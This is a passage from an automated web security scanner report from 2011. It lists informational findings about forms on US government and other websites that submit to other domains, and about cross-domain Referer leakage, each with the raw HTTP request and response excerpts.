Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<div id="thomas-top"><form id="billsearch" action="http://thomas.loc.gov/cgi-bin/query" method="post"> <input id="bill" value="Search bill number" onfocus="if(this.value=='Search bill number')this.value=''" onblur="if(this.value=='')this.value='Search bill number'" name="docidc111" class="text" type=
...[SNIP]...

11.10. http://israel.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://israel.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

queryc112
Enter

Request

GET / HTTP/1.1
Host: israel.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:09 GMT
Server: Apache
Set-Cookie: 9523fa6c9c4a8876a77fee4eb464f789=jf10q0dted36qbpn56rdei5qo3; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:52:10 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 53784
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >
<
...[SNIP]...
<div id="thomas-bottom"><form id="billsearch" action="http://thomas.loc.gov/cgi-bin/query" method="post"> <input id="word" value="Search word/phrase" onfocus="if(this.value=='Search word/phrase')this.value=''" onblur="if(this.value=='')this.value='Search word/phrase'" name="queryc112" class="text" type=
...[SNIP]...

11.11. http://nj.gov/nj/includes/styles/slideshow.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nj.gov
Path:	/nj/includes/styles/slideshow.css

Issue detail

The page contains a form which POSTs data to the domain search.state.nj.us. The form contains the following fields:

qt
submit search

Request

GET /nj/includes/styles/slideshow.css HTTP/1.1
Host: nj.gov
Proxy-Connection: keep-alive
Referer: http://nj.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:38:26 GMT
Content-length: 4769
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<td width="593" height="90" align="right" valign="top">
<form action="http://search.state.nj.us/query.html" method="post" name="seek" id="seek" >
<table width="100%" border="0" align="right" cellpadding="0" cellspacing="0" class="search">
...[SNIP]...

11.12. http://owens.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://owens.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

queryc112

Request

GET / HTTP/1.1
Host: owens.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:52:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: popup=2; expires=Tue, 08-May-2012 01:52:26 GMT; path=/
Set-Cookie: samesession=true; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 26444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta h
...[SNIP]...
</form>
<form action="http://thomas.loc.gov/cgi-bin/query" method="post">
<div class="other-search-box">
...[SNIP]...

11.13. http://owens.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://owens.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

docidc112
queryc112

Request

GET / HTTP/1.1
Host: owens.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 13 Jul 2011 01:52:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: popup=2; expires=Tue, 08-May-2012 01:52:26 GMT; path=/
Set-Cookie: samesession=true; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 26444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta h
...[SNIP]...
<div class="other-search-form">
<form action="http://thomas.loc.gov/cgi-bin/query" method="post">
<div class="other-search-box">
...[SNIP]...

11.14. http://peteking.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://peteking.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

docidc112
queryc112

Request

GET / HTTP/1.1
Host: peteking.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: USHR Webserver Ver 5.4.1
Content-Type: text/html
Date: Wed, 13 Jul 2011 01:52:28 GMT
Content-Length: 15433
Connection: close

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="C
...[SNIP]...
</div>

                               <FORM ACTION="http://thomas.loc.gov/cgi-bin/query" METHOD="POST" id="LForm">
                                   <label>
...[SNIP]...

11.15. http://rangel.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rangel.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

queryc112
docidc112

Request

GET / HTTP/1.1
Host: rangel.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html
X-Powered-By: ASP.NET
Server: U.S. House of Representatives
Date: Wed, 13 Jul 2011 01:53:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-
...[SNIP]...
</h2>
<form action="http://thomas.loc.gov/cgi-bin/query" method="post">
<p>
...[SNIP]...

11.16. http://tonko.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tonko.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

queryc112
Submit

Request

GET / HTTP/1.1
Host: tonko.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 53922
Content-Type: text/html
Content-Location: http://tonko.house.gov/index.html
Last-Modified: Fri, 08 Jul 2011 14:47:30 GMT
Accept-Ranges: bytes
ETag: "cf40dcf67d3dcc1:1720a"
X-Powered-By: ASP.NET
Server: U. S. House of Representatives
Date: Wed, 13 Jul 2011 01:44:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Congressman Paul Ton
...[SNIP]...
<td valign="top"> <form action="http://thomas.loc.gov/cgi-bin/query" method="post" name="loc-word"> <table border="0" cellpadding="0" cellspacing="0" width="100%">
...[SNIP]...

11.17. http://tonko.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tonko.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain thomas.loc.gov. The form contains the following fields:

docidc110
Submit
queryc112

Request

GET / HTTP/1.1
Host: tonko.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 53922
Content-Type: text/html
Content-Location: http://tonko.house.gov/index.html
Last-Modified: Fri, 08 Jul 2011 14:47:30 GMT
Accept-Ranges: bytes
ETag: "cf40dcf67d3dcc1:1720a"
X-Powered-By: ASP.NET
Server: U. S. House of Representatives
Date: Wed, 13 Jul 2011 01:44:48 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Congressman Paul Ton
...[SNIP]...
</form> <form action="http://thomas.loc.gov/cgi-bin/query" method="post" name="loc-number"> <table border="0" cellpadding="0" cellspacing="0" width="100%">
...[SNIP]...

11.18. http://www.buckthebuckleupdog.org/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.buckthebuckleupdog.org
Path:	/

Issue detail

The page contains a form which POSTs data to the domain www.accountsupport.com. The form contains the following fields:

account
mode
guestbook

Request

GET / HTTP/1.1
Host: www.buckthebuckleupdog.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:21 GMT
Content-Type: text/html
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Sun, 31 Jan 2010 21:17:06 GMT
ETag: "6083e17-404e-47e7c6409b028"
Accept-Ranges: bytes
Content-Length: 16462
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<form action="http://www.accountsupport.com/plugin/Guestbook.bml" method="post" target='mywindow' onSubmit="window.open('about:blank','mywindow', 'toolbar=no,location=no,directories=no,status=no, menubar=no, scrollbars=yes,resizable=yes,copyhistory=no,width=500,height=350')"> <input type='hidden' name='account' value='as.bucktheb'/>
...[SNIP]...

11.19. http://www.dos.state.ny.us/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.dos.state.ny.us
Path:	/

Issue detail

The page contains a form which POSTs data to the domain appext9.dos.ny.gov. The form contains the following fields:

p_entity_name
p_name_type
p_search_type

Request

GET / HTTP/1.1
Host: www.dos.state.ny.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 29096
Content-Type: text/html
Content-Location: http://www.dos.state.ny.us/index.html
Last-Modified: Fri, 08 Jul 2011 13:42:25 GMT
Accept-Ranges: bytes
ETag: "ef9119df743dcc1:4a3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 01:51:29 GMT
Connection: close

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New York State Department of State</title>

<link href="css/nav02.css" rel="stylesheet" t
...[SNIP]...
<div id="searchdos2" style="float:right; height:25px; padding: 0px 3px 0px 0px;">
<form action="http://appext9.dos.ny.gov/corp_public/CORPSEARCH.SELECT_ENTITY" method="post" target="_blank" >
<label for="p_entity_name">
...[SNIP]...

11.20. http://www.gnu.org/licenses/gpl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gnu.org
Path:	/licenses/gpl.html

Issue detail

The page contains a form which POSTs data to the domain crm.fsf.org. The form contains the following fields:

postURL
group[25]
cancelURL
_qf_default
email-Primary
_qf_Edit_next

Request

GET /licenses/gpl.html HTTP/1.1
Host: www.gnu.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.21. http://www.louise.house.gov/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.louise.house.gov
Path:	/

Issue detail

The page contains a form which POSTs data to the domain email.address-verify.com. The form contains the following fields:

crvs
Profile + Important Issues.filter
Profile + Important Issues.Source
Profile + Important Issues.First Name
email
submit
RadioButton.Profile + Important Issues

Request

GET / HTTP/1.1
Host: www.louise.house.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:50:57 GMT
Server: Apache
Set-Cookie: ce12a43d31101321362cf131b5cb4bf5=2m8kqb9hvsqs9ciisr3ds8m881; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Wed, 13 Jul 2011 01:50:58 GMT
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 65651
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>



<!--[if IE 8 ]> <html lang="en" clas
...[SNIP]...
<div class="sidebox signup"><form method="post" action="http://email.address-verify.com/q/akH76aYza6IKDdV55kCsXUtGxZ7tKYSiUl">
<input type="hidden" name="crvs" value="l92odHaE0CIoOP-ArUPEW1b9CI4Dqy2lBJRB3uASUpBF3sj0ungQ4LB5Cboe43Uq0NmYUUPyghPlOMjBfeRXBS1ry-B64RxltkJ3tbeE0OEabeDOJIiYDzmXXDLlIu0p5sgAEcfChOl1xesNzlWaT-BfPGQlVfJ
...[SNIP]...

11.22. http://www.nj.gov/nj/includes/scripts/common_functions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nj.gov
Path:	/nj/includes/scripts/common_functions.js

Issue detail

The page contains a form which POSTs data to the domain search.state.nj.us. The form contains the following fields:

qt
submit search

Request

GET /nj/includes/scripts/common_functions.js HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:49:56 GMT
Content-length: 4769
Content-type: text/html
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN">
<head>

...[SNIP]...
<td width="593" height="90" align="right" valign="top">
<form action="http://search.state.nj.us/query.html" method="post" name="seek" id="seek" >
<table width="100%" border="0" align="right" cellpadding="0" cellspacing="0" class="search">
...[SNIP]...

11.23. http://www.nj.gov/nj/includes/scripts/custom_functions.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.nj.gov
Path:	/nj/includes/scripts/custom_functions.js

Issue detail

The page contains a form which POSTs data to the domain search.state.nj.us. The form contains the following fields:

qt
submit search

Request

GET /nj/includes/scripts/custom_functions.js HTTP/1.1
Host: www.nj.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.24. http://www.state.nj.us/patentbank/feedback/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.state.nj.us
Path:	/patentbank/feedback/

Issue detail

The page contains a form which POSTs data to the domain www.salesforce.com. The form contains the following fields:

orgid
retURL
name
company
email
phone
subject
external
recordType
submit

Request

GET /patentbank/feedback/ HTTP/1.1
Host: www.state.nj.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 13 Jul 2011 01:50:30 GMT
Content-length: 15387
Content-type: text/html
Last-modified: Wed, 26 Aug 2009 15:21:55 GMT
Etag: "3c1b-4a955313"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="EN" lang="EN
...[SNIP]...

<form action="https://www.salesforce.com/servlet/servlet.WebToCase?encoding=UTF-8" method="post" onSubmit="return verify_email();" name="web2case_form" id="web2case_form">
<input type=hidden name="orgid" value="00D30000000JiZZ">
...[SNIP]...

12. Cross-domain Referer leakage previous next
There are 26 instances of this issue:

http://ads.doclix.com/adserver/serve/js/pop_under_unit.jsp
http://climate.rutgers.edu/njwxnet/station.php
https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp
http://maps.google.com/maps
https://market.android.com/details
https://market.android.com/details
https://market.android.com/developer
http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2
http://twitter.com/
http://twitter.com/
http://www.facebook.com/plugins/likebox.php
http://www.facebook.com/plugins/likebox.php
http://www.google.com/maps
http://www.google.com/search
https://www.lowes.com/webapp/wcs/stores/servlet/LogonForm
http://www.nysegov.com/citGuide.cfm
http://www.nysegov.com/citguide.cfm
http://www.search.state.ny.us/search
http://www.state.nj.us/lottery/about/6-0_about.htm
http://www.state.nj.us/lottery/didiwin/8-0_did_i_win.htm
http://www.state.nj.us/lottery/instant/2-0_instant_games.shtml
http://www.state.nj.us/lottery/multimedia/9-0_multimedia.htm
http://www.state.nj.us/lottery/news/5-0_news.htm
http://www.state.nj.us/lottery/retailer/7-0_retailer.htm
http://www.state.nj.us/lottery/vip/3-0_vip_gen_info.htm
http://www.state.nj.us/lottery/where/4-0_where.htm

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

12.1. http://ads.doclix.com/adserver/serve/js/pop_under_unit.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ads.doclix.com
Path:	/adserver/serve/js/pop_under_unit.jsp

Issue detail

The page was loaded from a URL containing a query string:

http://ads.doclix.com/adserver/serve/js/pop_under_unit.jsp?pid=16609&codeId=3794&refUrl=http%3A//soris.us/&ref=

The response contains the following link to another domain:

http://www.adside.com/

Request

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:41:28 GMT
Cache-Control: max-stale=0
max-age: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: ad_served=cG9wX3VuZGVy; Domain=.doclix.com; Expires=Sat, 23-Jul-2011 11:41:28 GMT; Path=/
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Content-Length: 17041
Connection: close

<!DOCTYPE HTML>
<html>
       <head>

           <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
           <title>AdSide: Sponsored Links</title>
           <script src="doclix_lib.js" type="tex
...[SNIP]...
<div id="doclix_ad_unit">
<a id="adside_call" href="http://www.adside.com" target="_blank">Sponsored Links</a>
...[SNIP]...

12.2. http://climate.rutgers.edu/njwxnet/station.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://climate.rutgers.edu
Path:	/njwxnet/station.php

Issue detail

The page was loaded from a URL containing a query string:

http://climate.rutgers.edu/njwxnet/station.php?s=58

The response contains the following links to other domains:

http://128.6.226.99/~njwxnet/charts/midsize/tempdewp-58-midsize.jpg
http://128.6.226.99/~njwxnet/charts/thumbnail/maxtemp-58-thumb.jpg
http://128.6.226.99/~njwxnet/charts/thumbnail/precip-58-thumb.jpg
http://128.6.226.99/~njwxnet/charts/thumbnail/precip_events-58-thumb.jpg
http://128.6.226.99/~njwxnet/charts/thumbnail/precip_totals-58-thumb.jpg
http://128.6.226.99/~njwxnet/charts/thumbnail/pressure-58-thumb.jpg
http://128.6.226.99/~njwxnet/charts/thumbnail/relhumid-58-thumb.jpg
http://128.6.226.99/~njwxnet/charts/thumbnail/solarradiation1-58-thumb.jpg
http://128.6.226.99/~njwxnet/charts/thumbnail/tempdewp-58-thumb.jpg
http://128.6.226.99/~njwxnet/charts/thumbnail/winds-58-thumb.jpg
http://128.6.226.99/~njwxnet/maps/thumbnails/njwxnet-radar_thumb.jpg
http://128.6.226.99/~njwxnet/maps/thumbnails/njwxnet-satelliteIR_thumbnail.jpg
http://128.6.226.99/~njwxnet/maps/thumbnails/njwxnet-temperature_thumb.jpg
http://groundwaterwatch.usgs.gov/AWLSites.asp?S=401804074432601
http://waterdata.usgs.gov/nj/nwis/nwisman/?site_no=01463500&agency_cd=USGS
http://weather.gov/
http://www.erh.noaa.gov/er/phi/
http://www.google-analytics.com/urchin.js
http://www.state.nj.us/transportation/traffic/cameras/rt95/rt95_2.8.shtm

Request

GET /njwxnet/station.php?s=58 HTTP/1.1
Host: climate.rutgers.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:51:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16947

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <title>Trenton, NJ - Forecast, Radar and Current Weather - NJWxnet</title>
   <link rel="styles
...[SNIP]...
<li><a href="http://www.erh.noaa.gov/er/phi/" target="_blank">NWS NJ Forecast</a>
...[SNIP]...
<li><a href="http://weather.gov" target="_blank">NWS US Forecast</a>
...[SNIP]...
<a href="mapviewer.php?m=temperature&t=cur"><img src="http://128.6.226.99/~njwxnet/maps/thumbnails/njwxnet-temperature_thumb.jpg">Latest Temperatures</a>
...[SNIP]...
<a href="mapviewer.php?m=radar&t=cur"><img src="http://128.6.226.99/~njwxnet/maps/thumbnails/njwxnet-radar_thumb.jpg">Latest Radar</a>
...[SNIP]...
<a href="mapviewer.php?m=satelliteIR&t=cur"><img src="http://128.6.226.99/~njwxnet/maps/thumbnails/njwxnet-satelliteIR_thumbnail.jpg">Latest IR Satellite</a>
...[SNIP]...
<img class="title" src="images/title_resourcelinks.png">
                       <a target='_new' class='resourceLink' href='http://groundwaterwatch.usgs.gov/AWLSites.asp?S=401804074432601'>Ground-water</a>
...[SNIP]...
</div><a target='_new' class='resourceLink' href='http://waterdata.usgs.gov/nj/nwis/nwisman/?site_no=01463500&agency_cd=USGS'>Streamflow</a>
...[SNIP]...
</div><a target='_new' class='resourceLink' href='http://www.state.nj.us/transportation/traffic/cameras/rt95/rt95_2.8.shtm'>Webcam</a>
...[SNIP]...
<div id="chart">
                           <img id="mainchart" src="http://128.6.226.99/~njwxnet/charts/midsize/tempdewp-58-midsize.jpg">
                       </div>
...[SNIP]...
<a href="javascript:swapChart('tempdewp-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/tempdewp-58-thumb.jpg'>24 Hour Temperature/Dewpt</a>
...[SNIP]...
<a href="javascript:swapChart('relhumid-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/relhumid-58-thumb.jpg'>Relative Humidity</a>
...[SNIP]...
<a href="javascript:swapChart('winds-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/winds-58-thumb.jpg'>24 Hour Winds</a>
...[SNIP]...
<a href="javascript:swapChart('pressure-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/pressure-58-thumb.jpg'>Barometric Pressure</a>
...[SNIP]...
<a href="javascript:swapChart('precip-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/precip-58-thumb.jpg'>Precipitation</a>
...[SNIP]...
<a href="javascript:swapChart('solarradiation1-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/solarradiation1-58-thumb.jpg'>Solar Radiation</a>
...[SNIP]...
<a href="javascript:swapChart('maxtemp-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/maxtemp-58-thumb.jpg'>30 Day Temperatures</a>
...[SNIP]...
<a href="javascript:swapChart('precip_totals-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/precip_totals-58-thumb.jpg'>90 Day Precip Totals</a>
...[SNIP]...
<a href="javascript:swapChart('precip_events-58-midsize.jpg')"><img src='http://128.6.226.99/~njwxnet/charts/thumbnail/precip_events-58-thumb.jpg'>90 Day Precip Events</a>
...[SNIP]...
</div>
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

12.3. https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://egov.dnrec.delaware.gov
Path:	/egovpublic/dnrec/disp

Issue detail

The page was loaded from a URL containing a query string:

https://egov.dnrec.delaware.gov/egovpublic/dnrec/disp?doc=LoginScreen&deptPath=public&op=showDefault&dept=5

The response contains the following link to another domain:

https://seal.verisign.com/getseal?host_name=egov.dnrec.delaware.gov&size=M&use_flash=NO&use_transparent=NO&lang=en

Request

GET /egovpublic/dnrec/disp?doc=LoginScreen&deptPath=public&op=showDefault&dept=5 HTTP/1.1
Host: egov.dnrec.delaware.gov
Connection: keep-alive
Referer: http://www.delaware.gov/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=173.193.214.243-1234505376.30151644:lv=1310522495650:ss=1310522357519

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 02:01:40 GMT
Server: Apache/2.2.0 (Fedora)
Content-Length: 35610
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/REC-html40/loose.dtd">
<html lang="en-us">
<head>

<m
...[SNIP]...
<td width="15%" align="left">

<script src=https://seal.verisign.com/getseal?host_name=egov.dnrec.delaware.gov&size=M&use_flash=NO&use_transparent=NO&lang=en></script>
...[SNIP]...

12.4. http://maps.google.com/maps previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://maps.google.com
Path:	/maps

Issue detail

The page was loaded from a URL containing a query string:

http://maps.google.com/maps?file\u003dgoogleapi

The response contains the following links to other domains:

http://maps.gstatic.com/mapfiles/mapcontrols3d5.png
http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif
http://maps.gstatic.com/mapfiles/transparent.png
http://www.youtube.com/results?file%5Cu003dgoogleapi=&sa=N&hl=en&tab=l1

Request

GET /maps?file\u003dgoogleapi HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 01:52:15 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
